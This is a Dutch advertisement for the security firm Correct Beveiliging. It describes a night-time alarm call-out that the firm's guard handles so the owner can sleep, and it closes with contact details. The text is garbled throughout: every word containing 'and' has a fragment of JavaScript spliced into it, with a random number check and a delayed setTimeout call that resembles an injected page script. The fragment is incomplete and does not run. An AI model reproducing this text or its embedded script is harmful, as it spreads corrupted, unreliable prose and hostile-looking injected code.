Uw nachtrust gewaarborgd door Correct Beveiliging

Nachtrust gewaarborgd

Het scenario

Het is drie uur in de ochtend… U schrikt wakker!!
De telefoon gaat…
Wat is er aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and? Is er iets ernstigs gebeurd?
U neemt geschrokken de telefoon op. Hallo???

Goedemorgen, dit is de alarmcentrale…..

Wij hebben een inbraakmelding ontvangen bij uw bedrijf. Wilt u gaan controleren wat er aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is?

Twijfelend kleedt u zich aan… Buiten is het erg donker. Bovendien regent het erg hard. U stapt de auto in en rijdt naar uw bedrijf. Het zicht is slecht en u bent gespannen…

Na 30 minuten bent u bij uw bedrijf. U ziet het al van buiten: de flitslamp op de gevel brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andt en het geluidssignaal van het alarm gaat af. Gespannen gaat u naar binnen en schakelt het alarm uit. Achter in het pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and hoort u iets klapperen… Uw hart klopt in uw keel….Hallo?….Is daar iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and??

Zo kan het gelukkig ook:

Het is half acht in de ochtend. U staat heerlijk uitgeslapen op om weer naar uw bedrijf te gaan. U ontbijt met uw gezin en gaat hierna naar kantoor.
U ziet in uw mailbox dat er de afgelopen nacht een alarmmelding is geweest en dat een beveiliger van Correct Beveiliging door de alarmcentrale is opgeroepen en de melding voor u heeft afgehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeld.

Hij was kort na de melding ter plaatse en heeft een controle uitgevoerd. Tijdens de controle bleek dat er een raam was open gewaaid, waardoor de lamellen waren gaan bewegen. Hierdoor was het alarm afgegaan en de melding veroorzaakt. De beveiliger heeft na de controle het systeem hersteld en weer ingeschakeld. Uiteraard heeft hij hierna uw pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and weer keurig afgesloten. Steeds meer ondernemers én particulieren weten Correct Beveiliging te vinden als integere en betrouwbare beveiligingspartner, die ervoor zorgt dat zij onbezorgd en uitgerust hun leven kunnen leiden en hun klanten kunnen bedienen.

Is uw interesse gewekt?

Neemt u dan gerust contact met ons op voor een vrijblijvende afspraak met een van onze adviseurs. Wij komen graag bij u op locatie om samen met u de mogelijkheden te bespreken en een op maat gesneden plan op te stellen.

U kunt ons bereiken op telefoonnummer 0416 69 14 91 of per e-mail: info@correct-groep.nl. Bij telefonisch contact kunt u vragen naar Albert Sitalsing.